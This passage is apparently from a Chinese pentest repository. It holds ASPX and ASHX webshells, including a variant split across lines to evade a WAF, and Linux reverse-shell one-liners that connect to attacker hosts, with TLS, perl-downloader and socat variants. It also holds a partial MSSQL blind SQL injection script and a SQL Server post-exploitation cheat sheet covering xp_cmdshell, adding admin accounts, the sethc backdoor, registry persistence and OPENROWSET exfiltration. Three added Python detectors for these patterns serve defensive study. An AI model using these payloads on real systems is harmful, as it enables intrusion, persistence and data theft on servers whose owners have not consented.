            decode = Encoding.GetEncoding(code_type).GetString(bytes);
        }
        catch
        {
            decode = code;
        }
        return decode;
    }

    public static void CodeInject(string input)
    {
        string ExecCode = EncodeBase64("utf-8", input);
        ObjectDataProvider objectDataProvider = new ObjectDataProvider()
        {
            ObjectInstance = new System.Diagnostics.Process(),
        };
        objectDataProvider.MethodParameters.Add("cmd.exe");
        objectDataProvider.MethodParameters.Add("/c " + DecodeBase64("utf-8",ExecCode));
        objectDataProvider.MethodName = "Start";
    }

    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        if (!string.IsNullOrEmpty(context.Request["input"]))
        {
            CodeInject(context.Request["input"]);
            context.Response.Write("Status: 执行完毕!");
        }
        else
        {
            context.Response.Write("1. example: http://www.xxxxxxx.com/ObjectDataProviderSpy.ashx?input=calc.exe\n\n");
            context.Response.Write("2. 程序调用cmd.exe/c calc.exe 执行命令,注意:本程序仅供实验学习 ObjectDataProvider类,请勿违法滥用!");
        }
    }
}
```
--------------------------------------------------------------------------------
/04-漏洞利用/ASPX WebShell免杀/ObjectDataProviderGetTypeSpy.ashx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ASPX WebShell免杀/ObjectDataProviderGetTypeSpy.ashx
--------------------------------------------------------------------------------
/04-漏洞利用/ASPX WebShell免杀/Object/DataProvidertypeofSpy.ashx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/04-漏洞利用/ASPX WebShell免杀/ObjectDataProvidertypeofSpy.ashx
--------------------------------------------------------------------------------
/04-漏洞利用/ASPX WebShell免杀/readme.md:
--------------------------------------------------------------------------------
The following aspx is blocked when uploaded directly
```
<%@ language = csharp %>
<%@ Import Namespace = System.Reflection %>
<%@ Import Namespace = System.Diagnostics %>
<%@ Import Namespace =System.IO %>
<%
ProcessStartInfo mypsi = new ProcessStartInfo();
mypsi.FileName = "cmd.exe";
mypsi.Arguments = "/C " + Request.QueryString["pass"];
mypsi.RedirectStandardOutput = true;
mypsi.UseShellExecute = false;
Process p = Process.Start(mypsi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
Response.Write(s);
%>
```
After splitting it across line breaks it is still syntactically valid and the waf does not block it; the code is as follows
```
<%
@
language
=
csharp
%>
<%
@
Import
Namespace
=
System.Reflection
%>
<%
@
Import
Namespace
=
System.Diagnostics
%>
<%
@
Import
Namespace
=
System.IO
%>
<%
ProcessStartInfo
mypsi
=
new
ProcessStartInfo();
mypsi.FileName
=
"cmd.exe";
mypsi.Arguments
=
"/C "
+
Request.QueryString
[
"pass"
];
mypsi.RedirectStandardOutput
=
true;
mypsi.UseShellExecute
=
false;
Process
p
=
Process.Start(mypsi);
StreamReader
stmrdr
=
p.StandardOutput;
string
s
=
stmrdr.ReadToEnd();
Response.Write
(
s
);
%>
```
--------------------------------------------------------------------------------
/04-漏洞利用/DNSLog自建.md:
--------------------------------------------------------------------------------
Based on the project: https://github.com/lanyi1998/DNSlog-GO

Downloading it to a vps (ubuntu 18.04) and running it gave the error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found; either install the matching library version or recompile on the vps

I chose to recompile. I installed go with apt, and compiling DNSlog-GO failed because it could not find the packages, even though the packages were right there in the current directory. After some troubleshooting I found that the apt version of go is 1.10, which brings in the GO111MODULE environment variable; in short, go 1.10 cannot find packages in the current directory, and the root cause is that ubuntu 18.04 is too old

I downloaded and installed 1.18 from the official site, set the environment variables, and it compiled successfully

On startup port 53 was in use; run: systemctl stop systemd-resolved

Buy a domain on Alibaba Cloud, a.com, and configure it
Add an A record named ns whose value is the vps IP address
Add an NS record named log whose value is ns.a.com (the A record just added)

Allow all tcp, icmp and udp on the vps

config.yaml as follows
```
HTTP:
  port: 30000
  # {"token":"the subdomain for that user"}
  user: {"changbaishanlab": "red"}
  consoleDisable: false
Dns:
  domain: log.changbaishanlab.online
```

References:
https://www.f12bug.com/archives/dnslog平台搭建
https://cn-sec.com/archives/1526334.html
https://cloud.tencent.com/developer/article/1948254
--------------------------------------------------------------------------------
/04-漏洞利用/Linux下反弹Shell.md:
--------------------------------------------------------------------------------
### 2. Check whether the target can send icmp traffic outbound
```
Method 1:
On the victim: ping -c 1 202.98.0.68>icmp.txt
On the victim: ls -alh
On the victim: cat icmp.txt

Method 2:
On the VPS: tcpdump -i eth0 -n -v icmp|grep -i "length 93"
On a Linux victim: ping -s 65 -c 1 xx.xx.xx.xx
On a Windows victim: ping -l 65 -n 1 xx.xx.xx.xx
```
### 3. Check whether the target can send dns traffic outbound
```
Method 1:
On the victim: ping -c 1 www.baidu.com>dns.txt
On the victim: ls -alh
On the victim: cat dns.txt

Method 2:
Generate a subdomain on the reverse-connection platform dnslog.cn
On the victim: ping xxx.dnslog.cn
Check the platform

To modify hosts, the following does not work (tested):
sudo echo "127.0.0.2 www.baidu.com" >> /etc/hosts
It only works when run as the root user:
echo "127.0.0.2 www.baidu.com" >> /etc/hosts
```
### 3. Check which outbound ports are open
```
On the VPS: nc -n -v -lp 3636
On the victim: curl http://xx.xx.xx.xx:3636
```
### 4. Reverse shell
```
bash reverse shell:
On the VPS: nc -n -v -lp 1024
On the victim: /bin/bash -i >& /dev/tcp//1024 0>&1
Note: when exploiting command injection from the URL bar or in burp, run: /bin/bash -i %3E%26 /dev/tcp/xx.xx.xx.xx/1024 0%3E%261

exec reverse shell: 0<&196;exec 196<>/dev/tcp//1024; sh <&196 >&196 2>&196

Other reverse-shell commands can be looked up in the Hack-Tools browser extension
```
### 5. Reverse shell that evades traffic inspection
```
Step 1, generate a key pair and certificate on the VPS:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Step 2, listen for the reverse shell on the VPS:
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
Step 3, on the victim, wrap the reverse-shell traffic in TLS with openssl:
mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect xx.xx.xx.xx > /tmp/s;rm /tmp/s
The VPS now has a dumb shell
```
### 6. Upgrade the dumb shell to a fully interactive shell
```
Step 1, in the dumb shell run:
python -c 'import pty;pty.spawn("/bin/bash")'
Step 2: press Ctrl-z to return to the VPS command line
Step 3, on the VPS run the following to return to the dumb shell:
stty raw -echo
fg
Step 4, in the dumb shell press Ctrl-l and run:
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104
The shell on the VPS is now fully functional

If pressing Ctrl-z in the obtained shell exits the session, consider the socat approach:

Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Victim:
curl -o /tmp/socat http://192.168.81.160:8000/socat   or   wget -O /tmp/socat http://192.168.81.160:8000/socat
chmod u+x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444
The resulting shell supports deleting characters, command history and Ctrl-c
```
### References:
https://www.freebuf.com/vuls/211847.html
https://saucer-man.com/information_security/233.html#cl-1



perl reverse shell
bash command that generates the download script:
```
echo use LWP::Simple\;\$url=\"http://1.1.1.1/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl
```
Running it produces d.pl; running d.pl downloads r.pl; r.pl (the perl script used for the reverse connection) is:
```
use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"1.1.1.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}};
```

1. bash reverse shell
On the attacker: nc -lvp 2333
On the victim:
```
bash -i >& /dev/tcp/1.1.1.1/2333 0>&1
```
# Bash reverse shell that evades traffic-inspection devices on Linux
```
bash -c 'exec bash -i &>/dev/tcp/120.48.45.46/12345 <&1'

bash -c bash${IFS}-i${IFS}>&/dev/tcp/120.48.45.46/12345<&1
```
Reference: https://blog.csdn.net/whatday/article/details/107098353
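The ASPX WebShell免杀 readme above shows why a WAF that matches literal byte sequences misses the newline-split form of the same handler. The block below is an added example, not code from the pentest-hub repository: it tokenizes ASP.NET source so that whitespace placement no longer matters and applies the same indicators to both forms; the two samples are constructed, shortened versions of the handlers shown on the page.

```python
"""Added example (not from the pentest-hub repo): whitespace-insensitive
indicator matching for ASP.NET webshell uploads."""
import re

# Tokens: string literals, identifiers (dots allowed, e.g. System.Diagnostics)
# and any other single non-blank character. Whitespace and newlines vanish.
TOKEN = re.compile(r'"[^"\n]*"|[A-Za-z_][\w.]*|\S')

# Indicators, written in the normalized form produced by normalize_source().
INDICATORS = {
    "diagnostics_import": "Import Namespace=System.Diagnostics",
    "process_start_info": "new ProcessStartInfo()",
    "cmd_exe_filename":   'FileName="cmd.exe"',
    "request_to_args":    'Arguments="/C "+Request.QueryString[',
    "process_start":      "Process.Start(",
    "odp_process_gadget": "ObjectInstance=new System.Diagnostics.Process()",
    "odp_method_start":   'MethodName="Start"',
}

# The literal form a naive rule set would use (spacing exactly as in the original file).
NAIVE_SIGNATURES = ["Namespace = System.Diagnostics", 'mypsi.FileName = "cmd.exe"', "Process.Start(mypsi)"]


def _wordish(ch):
    return ch.isalnum() or ch in '_"'


def normalize_source(source):
    """Re-join the tokens, keeping a single space only between two word-like tokens."""
    out = []
    for tok in TOKEN.findall(source):
        if out and _wordish(out[-1][-1]) and _wordish(tok[0]):
            out.append(" ")
        out.append(tok)
    return "".join(out)


def naive_match(source):
    """Signatures matched against the raw bytes: defeated by the split form."""
    return [s for s in NAIVE_SIGNATURES if s in source]


def normalized_match(source):
    """Indicators matched after normalization: identical for both forms."""
    text = normalize_source(source)
    return [name for name, needle in INDICATORS.items() if needle in text]


# Constructed samples: a shortened form of the page's cmd.exe handler, once
# as written and once with every token on its own line as in the readme.
COMPACT = '''<%@ language = csharp %>
<%@ Import Namespace = System.Diagnostics %>
<%
ProcessStartInfo mypsi = new ProcessStartInfo();
mypsi.FileName = "cmd.exe";
mypsi.Arguments = "/C " + Request.QueryString["pass"];
Process p = Process.Start(mypsi);
%>'''
SPLIT = "\n".join(TOKEN.findall(COMPACT))

# Constructed shortened form of the ObjectDataProvider handler (1.aspx).
ODP = '''ObjectDataProvider odp = new ObjectDataProvider()
{
    ObjectInstance = new System.Diagnostics.Process(),
};
odp.MethodName = "Start";'''

if __name__ == "__main__":
    print("naive, compact:", naive_match(COMPACT))
    print("naive, split:  ", naive_match(SPLIT))
    print("normalized:    ", normalized_match(SPLIT))
```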
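The two Linux反弹Shell files above list the shapes a reverse shell takes on the victim: /dev/tcp redirections, the ${IFS} and base64 wrappings, the URL-encoded injection form, the mkfifo plus openssl TLS variant, and the socat and pty upgrades. From the detection side, the block below is an added example, not code from the pentest-hub repository: it normalizes a recorded command line the way the shell would before running it, then checks for those shapes; the audit lines are constructed and use loopback addresses.

```python
"""Added example (not from the pentest-hub repo): flag reverse-shell command
lines after undoing the obfuscations listed on the page."""
import base64
import re
from urllib.parse import unquote

# brace-expansion form used on the page: bash -c {echo,<b64>}|{base64,-d}|{bash,-i}
B64_BRACE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}")
# plain form: echo <b64> | base64 -d
B64_PLAIN = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)")

RULES = [
    ("bash_dev_tcp",    re.compile(r"/dev/tcp/[^/\s]*/\d+")),              # bash -i >& /dev/tcp/host/port
    ("exec_fd_shell",   re.compile(r"exec\s+\d+<>/dev/tcp")),               # exec 196<>/dev/tcp/...
    ("fifo_tls_shell",  re.compile(r"mkfifo\s+\S+.*openssl\s+s_client")),   # mkfifo ... | openssl s_client
    ("socat_pty_shell", re.compile(r"socat\s+exec:.*,pty")),                # socat exec:'bash -li',pty,...
    ("pty_upgrade",     re.compile(r"pty\.spawn\(")),                       # python -c 'import pty;pty.spawn(...)'
]


def normalize_command(cmd):
    """Return (normalized command, decoded base64 stages).

    ${IFS} is what the shell expands to whitespace, %3E%26 is what a payload
    injected through a URL becomes, and any embedded base64 stage is decoded
    and appended so the rules see the command that would actually run.
    """
    cmd = unquote(cmd)
    cmd = cmd.replace("${IFS}", " ").replace("$IFS", " ")
    stages = []
    for pattern in (B64_BRACE, B64_PLAIN):
        for match in pattern.finditer(cmd):
            try:
                stages.append(base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace"))
            except ValueError:
                continue                      # not real base64: leave the rules to the raw text
    return cmd + "".join(" ; " + s for s in stages), stages


def scan_command(cmd):
    """Sorted rule names that match the command; empty for benign commands."""
    text, stages = normalize_command(cmd)
    hits = {name for name, rx in RULES if rx.search(text)}
    if stages:
        hits.add("base64_stage")
    return sorted(hits)


def scan_log(lines):
    """Map line index -> rule names, for lines that carry a cmd= field and match."""
    findings = {}
    for idx, line in enumerate(lines):
        _, sep, cmd = line.partition("cmd=")
        if sep:
            hits = scan_command(cmd)
            if hits:
                findings[idx] = hits
    return findings


# Constructed sample log (process-execution audit style); addresses are loopback.
SAMPLE_LOG = [
    "uid=33 cmd=ls -alh /var/www",
    "uid=33 cmd=bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODAwMCAwPiYx}|{base64,-d}|{bash,-i}",
    "uid=33 cmd=bash -c bash${IFS}-i${IFS}>&/dev/tcp/127.0.0.1/12345<&1",
    "uid=33 cmd=/bin/bash -i %3E%26 /dev/tcp/127.0.0.1/1024 0%3E%261",
    "uid=33 cmd=sh -c mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 127.0.0.1:443 > /tmp/s",
    "uid=33 cmd=python -c import pty;pty.spawn(\"/bin/bash\")",
    "uid=33 cmd=/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:4444",
    "uid=1000 cmd=curl -s http://127.0.0.1:8080/health",
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(idx, hits, "<-", SAMPLE_LOG[idx])
```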
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/MSSQL-Boolean-Blind-EXP/mssql-boolean-blind-exp.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/python3

import requests
import sys


def convert_ascii_to_char(encoded_list):
    decoded_str = ""
    for i in encoded_list:
        decoded_str += chr(i)
    return decoded_str


def http_request(new_url):
    r = requests.get(new_url)
    return r.status_code, len(r.text)


def abort_on_error(status_code):
    # the boolean oracle only works on 200 responses; stop on anything else
    if status_code == 500:
        print("return status code is 500, means internal server error")
        exit()
    elif status_code == 404:
        print("return status code is 404, means not found")
        exit()
    elif status_code == 403:
        print("return status code is 403, means forbidden")
        exit()
    elif status_code != 200:
        print("return status code is unknown")
        exit()


# guess the number of databases
def guess_db_count(url):
    db_payload_0 = "' and (select count(*) from master.dbo.sysdatabases)=7 and 'a'='a"
    for i in range(1, 51):
        payload = "xxx" + str(i) + ""
        new_url = url + payload
        return_array = http_request(new_url)
        abort_on_error(return_array[0])
        print("the length of the return text is: " + str(return_array[1]) + " , and the payload is: " + str(i))

# guess the number of characters in a given database name
db_payload_1 = "' and (select COUNT(*) from master.dbo.sysdatabases where dbid=1 and LEN(name)=6)=1 and 'a'='a"

# guess each character of a given database name
db_payload_2 = "' and ascii(substring((select name from master.dbo.sysdatabases where dbid=1),1,1))=1 and 'a'='a"

# guess the database name length
#def guess_db_name_length(url):

# guess the database name
#def guess_db_name(url):

# guess the number of tables
def guess_table_count(url):
    #payload = "' and (select COUNT(*) from EWebNewsNET5.dbo.sysobjects where xtype='u')=1 and 'a'='a"
    for i in range(1, 51):
        payload = "' and (select COUNT(*) from EWebNewsNET5.dbo.sysobjects where xtype='u')=" + str(i) + " and 'a'='a"
        new_url = url + payload
        return_array = http_request(new_url)
        abort_on_error(return_array[0])
        print("Attempt " + str(i) + ": the length of the return text is: " + str(return_array[1]) + " and the payload is: " + str(i))

# guess the table name length
def guess_table_name_length(url):
    #payload = "' and len((select top 1 name from EWebNewsNET5.dbo.sysobjects where xtype='u'))=9 and 'a'='a"
    #for i in range(1, 22):
    for j in range(1, 51):
        payload = "' and len((select top 1 name from EWebNewsNET5.dbo.sysobjects where xtype='u'))=" + str(j) + " and 'a'='a"
        new_url = url + payload
        return_array = http_request(new_url)
        abort_on_error(return_array[0])
        print("Attempt " + str(j) + ": the length of the return text is: " + str(return_array[1]) + " and the payload is: " + str(j))

# guess the table name
def guess_table_name(url, db_name):
    #payload = "' and ascii(substring((select top 1 name from EWebNewsNET5.dbo.sysobjects where xtype='u'),1,1))=1 and 'a'='a"
    table_name = ""
    for i in range(1, 7):
        with open("char-ascii.txt", "r") as f:
            lines = f.readlines()
            for line in lines:
                j = line.strip("\n")
                payload = "' and ascii(substring((select top 1 name from " + db_name + ".dbo.sysobjects where xtype='u')," + str(i) + ",1))='" + j + "' and 'a'='a"
                new_url = url + payload
                return_array = http_request(new_url)
                abort_on_error(return_array[0])
                print("Attempting character " + str(i) + " payload " + j)
                if return_array[1] != 15:
                    table_name += chr(int(j))
                    print(" Yes, the character " + chr(int(j)) + " is where you need")
                    break
    print("Congratulation, The final table name is: " + table_name)

# guess the number of columns
def guess_column_count(url):
    # guess the number of columns of a given table
    column_payload = ""
    for i in range(1, 51):
        payload = "xxx" + str(i) + ""
        new_url = url + payload
        return_array = http_request(new_url)
        abort_on_error(return_array[0])
        print("the length of the return text is: " + str(return_array[1]) + " , and the payload is: " + str(i))

# guess the column name length
#def guess_column_name_length(url):

# guess the column name
#def guess_column_name(url):

# guess the number of values
def guess_value_count(url):
    # guess the number of values of a given column of a given table of a given database
    value_payload = ""
    for i in range(1, 51):
        payload = "xxx" + str(i) + ""
        new_url = url + payload
        return_array = http_request(new_url)
        abort_on_error(return_array[0])
        print("the length of the return text is: " + str(return_array[1]) + " , and the payload is: " + str(i))

# guess the value length
#def guess_value_name_length(url):

# guess the value
#def guess_value_name(url):

def main():
    if len(sys.argv) != 2:
        print("Usage: below example is from linux")
        print("Usage: python3 sqlserver-boolean-blind-exp.py http://www.example.com/index.php?id=5")
        exit()
    else:
        url = sys.argv[1]

    db_names = ["EWebNewsNET5", "rykp"]
    db_name = db_names[0]
    guess_table_name(url, db_name)

main()
```
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/MSSQL-Boolean-Blind-EXP/readme.md:
--------------------------------------------------------------------------------
This exp was written for exploiting a vulnerability during a penetration test I did for a client (it contains only the parts I needed for that exploitation; the rest remains to be completed)
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/Oracle注入WAF绕过.md:
--------------------------------------------------------------------------------
```
https://iswin.org/2015/06/13/hack-oracle/#%E5%8F%8D%E5%BC%B9SHELL
```
--------------------------------------------------------------------------------
/04-漏洞利用/SQL注入/SQLServer数据库攻击.md:
--------------------------------------------------------------------------------
-- get all database names, including system databases
-- SELECT name FROM master.dbo.sysdatabases
-- get all non-system database names
-- select [name] from master.dbo.sysdatabases where DBId>6 Order By [Name]
-- get all information, including database file paths
-- select * from master.dbo.sysdatabases where DBId>6 Order By [Name]

This statement returns all user tables

select * from sysobjects where xtype='u'

Query information on all tables in the system

select * from sysobjects

Show the machine name
select * from sys.servers


List directories
exec master.dbo.xp_subdirs 'c:\'

exec master.dbo.xp_dirtree 'c:',1,1    can be run with db_owner privileges

exec master.dbo.xp_dirtree 'c:/Program Files',1,1


Program code, write a webshell

exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select "<%execute(request("SB"))%>"'



execute master..xp_enumgroups    enumerate system users

execute master..xp_getnetname    get the current machine name

-- List the fixed drives on the server and the free space on each
execute master..xp_fixeddrives    //dbo public

execute xp_ntsec_enumdomains

-- Create a login account for MSSQL
exec master.dbo.sp_addlogin name,pass;--



-- List the server's domain names
xp_ntsec_enumdomains    //machine name //dbo public

-- Stop or start a service
xp_servicecontrol 'stop','schedule'    //schedule is the service name //dbo

-- Kill a running program by pid
xp_terminate_process 123    //123 is the pid //dbo

-- List only the subdirectories of a directory
dbo.xp_subdirs 'C:'    //dbo

How to enable xp_cmdshell on SQL Server 2005
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
How to enable 'OPENROWSET' support on SQL 2005:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
How to enable 'sp_oacreate' support on SQL 2005:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE


How to enable xp_cmdshell on SQL Server 2008

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

exec xp_cmdshell 'ipconfig'

Today I wanted to change the sa login password on the database server, but I had suddenly forgotten it, so I had to open Query Analyzer with another account and change the sa password; it is very simple:

Execute:
sp_password Null,'teracypwd','sa'
This sets the SA password to "teracypwd"

When it succeeds you get "Command(s) completed successfully." OK!
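Read from the defender's side, the recipes in this file (turning on xp_cmdshell, Ole Automation Procedures or Ad Hoc Distributed Queries through sp_configure, re-registering extended procedures, xp_regwrite to the Jet SandBoxMode or Run keys, CMDEXEC agent job steps, OPENROWSET to an outside address) are exactly the statements a DBA should alert on. The following is an added example of mine, not code from this repository: it classifies constructed SQL Server statement-audit events (the log line format, the rule names and the sample values are my assumptions) and flags a session that walks through several of these steps in sequence.

```python
import re

# Constructed sample of statement-level audit events (not real logs): one
# event per line as "<ts> login=<login> client=<ip> stmt=<T-SQL>".
SAMPLE_EVENTS = [
    "2024-07-01T10:00:01Z login=webapp client=10.0.0.5 stmt=select * from sysobjects where xtype='u'",
    "2024-07-01T10:00:02Z login=webapp client=10.0.0.5 stmt=EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
    "2024-07-01T10:00:03Z login=webapp client=10.0.0.5 stmt=exec master.dbo.xp_cmdshell 'ipconfig'",
    "2024-07-01T10:00:04Z login=webapp client=10.0.0.5 stmt=exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',0",
    '2024-07-01T10:00:05Z login=webapp client=10.0.0.5 stmt=dbcc addextendedproc ("xp_cmdshell","xplog70.dll")',
    "2024-07-01T10:00:06Z login=webapp client=10.0.0.5 stmt=insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=x;Network=DBMSSOCN;Address=203.0.113.9,80;','select * from t') select * from src",
    "2024-07-01T10:00:07Z login=webapp client=10.0.0.5 stmt=exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c ipconfig'",
    "2024-07-01T10:00:08Z login=dba client=10.0.0.2 stmt=exec sp_addrolemember N'db_datareader', N'report'",
]

EVENT_RE = re.compile(r"^(?P<ts>\S+) login=(?P<login>\S+) client=(?P<client>\S+) stmt=(?P<stmt>.*)$")

# Each rule names one step from the cheat sheet above and the pattern that
# identifies it in an executed statement (rule names are my own labels).
RULES = [
    ("enable-dangerous-option",
     re.compile(r"sp_configure\s*'?(xp_cmdshell|ole automation procedures|ad hoc distributed queries)'?\s*,\s*1\b", re.I)),
    ("os-command",
     re.compile(r"exec(?:ute)?\s+(?:master\.(?:dbo)?\.)?xp_cmdshell|sp_oamethod\s+@\w+\s*,\s*'run'", re.I)),
    ("reregister-extended-proc",
     re.compile(r"sp_addextendedproc|dbcc\s+addextendedproc", re.I)),
    ("sensitive-registry-write",
     re.compile(r"xp_regwrite.*(?:image file execution options|sandboxmode|currentversion\\run)", re.I)),
    ("agent-job-command",
     re.compile(r"sp_add_jobstep.*'cmdexec'", re.I)),
    ("outbound-data-link",
     re.compile(r"(?:openrowset|opendatasource)\s*\(\s*'sqloledb'", re.I)),
]

# Everything not listed here is treated as high severity.
SEVERITY = {"outbound-data-link": "medium"}


def classify(stmt):
    """Return the rule names that match one executed statement, in rule order."""
    return [name for name, pat in RULES if pat.search(stmt)]


def triage(events):
    """Parse the event lines and keep only those that hit at least one rule."""
    findings = []
    for line in events:
        m = EVENT_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the pipeline
        cats = classify(m["stmt"])
        if cats:
            sev = "medium" if all(SEVERITY.get(c) == "medium" for c in cats) else "high"
            findings.append({"ts": m["ts"], "login": m["login"], "client": m["client"],
                             "categories": cats, "severity": sev})
    return findings


def chained_sessions(findings, min_categories=3):
    """(login, client) pairs that touched at least min_categories distinct rules:
    one of these steps alone may be admin work, several in a row rarely are."""
    seen = {}
    for f in findings:
        seen.setdefault((f["login"], f["client"]), set()).update(f["categories"])
    return {s for s, cats in seen.items() if len(cats) >= min_categories}


if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for f in results:
        print(f["ts"], f["severity"], f["login"], f["client"], ",".join(f["categories"]))
    print("chained sessions:", chained_sessions(results))
```

The rule for xp_cmdshell deliberately requires an `exec ... xp_cmdshell` call so that the sp_configure line that merely names the option is counted once, as an enable event, and the actual command execution is counted separately; on a real deployment these events would come from SQL Server Audit or Extended Events rather than the constructed lines above.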



How to obtain the MSSQL database server's IP with db privileges when the web server and database server are separated

1. Listen locally with nc: nc -vvlp 80

2. ;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=your-ip,80;', 'select * from dest_table') select * from src_table;--

select * from openrowset('sqloledb','server=125.110.145.130,6789;uid=sa;pwd=zhu','select user;')



Removing and restoring xp_cmdshell

How to restore xp_cmdshell
Statement to drop the extended stored procedure xp_cmdshell
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and
If the result is 1, it is OK

Otherwise, upload c:\inetput\web\xplog70.dll first and then
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetput\web\xplog70.dll';--

If it was removed with the following
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

then it can be restored with the following statements
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores them directly, regardless of whether sp_addextendedproc still exists



1. With xp_cmdshell:
exec master.dbo.xp_cmdshell "net user admin admin /add"
exec master.dbo.xp_cmdshell "net localgroup administrators admin /add"
2. Without xp_cmdshell, using sp_oacreate and sp_oamethod:
declare @object int
exec sp_oacreate 'wscript.Shell',@object out
exec sp_oamethod @object,'Run',NULL,'net user admin admin /add'
exec sp_oamethod @object,'Run',NULL,'net localgroup Administrators admin /add'
Note: regsvr32 /s c:\windows\system32\wshom.ocx enables wscript.shell
3. Using sp_oacreate with FSO
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
4. Using xp_regwrite (db_owner, requires a reboot):
exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\windows\currentversion\run','eadd1','reg_sz','net user admin admin /add'
exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\windows\currentversion\run','eadd2','reg_sz','net localgroup administrators admin /add'
5. Using sp_add_job:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user admin admin /add'
exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'








Many people have succeeded on a lot of machines with sa straight through sandbox mode, but I have never tried it myself and am not sure of the success rate. When the extended procedures have been dropped, first restore registry read and write access.
dbcc addextendedproc ('xp_regread','xpstar.dll')
dbcc addextendedproc ('xp_regwrite','xpstar.dll')

Fix the sandbox protection mode
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--

Check whether the 'SandBoxMode' value has become 0.

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

Finally invoke sandbox mode
select * from openrowset('microsoft.jet.oledb.4.0',';database=C:\WINDOWS\system32\ias\dnary.mdb','select shell("cmd.exe /c net user user passwd /add")')



1. If sandbox protection mode has not been "turned off", an error is returned:
服务器: 消息 7357,级别 16,状态 2,行 1
未能处理对象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。
OLE DB 错误跟踪[Non-interface error: OLE DB provider unable to process object, since the object has nocolumnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。

2. If the .mdb does not exist or the path was typed incorrectly
服务器: 消息 7399,级别 16,状态 1,行 1
OLE DB 提供程序 'microsoft.jet.oledb.4.0' 报错。
